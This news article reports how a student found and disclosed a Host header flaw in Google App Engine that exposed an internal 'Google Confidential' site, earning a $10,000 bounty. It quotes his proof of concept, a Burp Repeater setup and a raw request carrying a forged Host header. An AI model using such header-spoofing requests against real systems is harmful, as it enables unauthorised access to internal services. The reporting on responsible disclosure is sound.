This week, Ezequiel Pereira said in a blog post that he went bug hunting on July 11 simply due to boredom, and after several failed attempts, stumbled upon a way to change the Host Header in requests to the App Engine server without authentication.
The majority of his attempts to change the header -- in order to gain access to internal apps such as *.googleplex.com which usually requires going through the Google MOMA login page to authenticate -- failed and returned 404 Not Found errors or security barriers.
However, after using the security testing suite Burp, the student came across one website that did allow unauthenticated access, yaqs.googleplex.com.
The web server did not check Pereira's credentials and redirected him to "/eng," which, in turn, exposed links to different sections of Google Services and infrastructure, including a note in the footer dubbed "Google Confidential."
This was proof enough, and rather than poke around further, the student then "reported the issue right away" with proof-of-concept (PoC) evidence.
The PoC sent to Google is below, based on the Burp suite:
Go to the Repeater tab
Set the target host to "www.appspot.com", the target port to "443" and check the "Use HTTPS" option
Write this raw HTTP request (Including the last two empty lines):
GET /eng HTTP/1.1 Host: yaqs.googleplex.com
Attack scenario: Anyone can access an internal Google website called YAQS that says "Google Confidential" in the footer.
A few hours later, Google's security team responded.
"I thought to myself "Cool, this is probably a small thing that isn't worth a dime, the website probably had some technical stuff about Google servers and nothing really important," the student commented. "I don't know what the website contain[ed], but some weeks later I got an email right after getting out of school that said my report was worth much more than a dime."
Several weeks later, Google's team had triaged and fixed the issue, which was actually worth a bug bounty reward of $10,000 as the team managed to find variants of the issue that would have allowed an attacker to access sensitive data based on Pereira's report.
On occasion, bugs like this can still be found, but in general, Google has bumped up payments for high-severity vulnerabilities through the tech giant's bug bounty program. Remote code execution (RCE) can now earn researchers over $30,000 per report as they are becoming more scarce and difficult to find.